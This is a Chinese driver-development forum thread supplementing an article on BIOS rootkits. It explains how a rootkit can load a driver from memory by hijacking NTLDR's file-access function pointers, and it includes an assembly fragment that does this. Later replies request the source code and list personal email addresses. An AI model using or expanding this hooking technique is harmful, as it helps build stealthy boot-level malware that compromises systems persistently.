BIOS rootkit的一点补充

楼主^#

更多发布于：2007-06-23 00:52

读了BIOS Rootkit:Welcome home,my Lord!的文章,觉得如何运行一个driver说的很模糊,好像还有点复杂,本人就补充一下这点:
可以直接调用NTLDR的BlLoadDeviceDriver函数,但问题在于该函数是从硬盘上加载driver,但现在rootkit的driver位于内存中，就必须重载NTLDR中访问硬盘的相关函数，它们是：
BlOpen,BlRead,BlSeek函数，在NTLDR中通过一个静态变量FTablAddr来存放这些函数的指针，只要将这些函数指针先指向我们的内存文件访问函数，就能实现内存加载driver.
对各个版本的操作系统，可以用IDA之类找到FTablAddr的地址，然后修改之中的相关指针下面是一段代码：
;saving funAddr:
   mov eax,FTablAddr
   mov ebx,[eax]
   push dword ptr [ebx+8] ;openFun
   push dword ptr [ebx+12] ;readFun
   push dword ptr [ebx+20] ;seekFun

   mov eax,MyOpen
   call cntFunAddr
   mov dword ptr [ebx+8],eax

   mov eax,MyRead
   call cntFunAddr
   mov dword ptr [ebx+12],eax

   mov eax,MySeek
   call cntFunAddr
   mov dword ptr [ebx+20],eax

喜欢0

cheng_5103

驱动牛犊

注册日期2003-10-06
最后登录2012-03-21
粉丝0
关注0
积分23分
威望228点
贡献值0点
好评度45点
原创分0分
专家分0分

加关注写私信

沙发^#

发布于：2008-03-17 20:49

兄台:
能否把bios rootkit的演示代码..发份给我..
cheng_5103@126.com
cheng_5103@sohu.com
先谢过了..我很想看下哈!!

cheng

回复喜欢

dlf2008 驱动牛犊注册日期2008-10-26 最后登录2008-11-05 粉丝0 关注0 积分1分威望2点贡献值0点好评度0点原创分0分专家分0分加关注写私信	板凳^# 发布于：2008-10-27 09:59 你好，能否发一份你的程序给我，我想学习学习先谢谢你了我的邮箱是：122433468@qq.com
	回复(0) 喜欢(0)

LOIEN

驱动牛犊

注册日期2007-12-20
最后登录2009-10-18
粉丝0
关注0
积分13分
威望61点
贡献值0点
好评度2点
原创分0分
专家分0分

加关注写私信

地板^#

发布于：2008-10-27 11:10

呃，刚看见给我也发一份吧
dayed.hell@gmail.com

驱网无线，快乐无限

回复喜欢

ydfivy 驱动牛犊注册日期2010-03-15 最后登录2024-05-30 粉丝0 关注1 积分3分威望31点贡献值0点好评度0点原创分0分专家分0分加关注写私信	地下室^# 发布于：2010-05-04 21:12 我有这个源码。想要代码的加我108017820
	回复(0) 喜欢(0)

您需要登录后才可以回帖，登录或者注册

BIOS rootkit的一点补充

最新喜欢：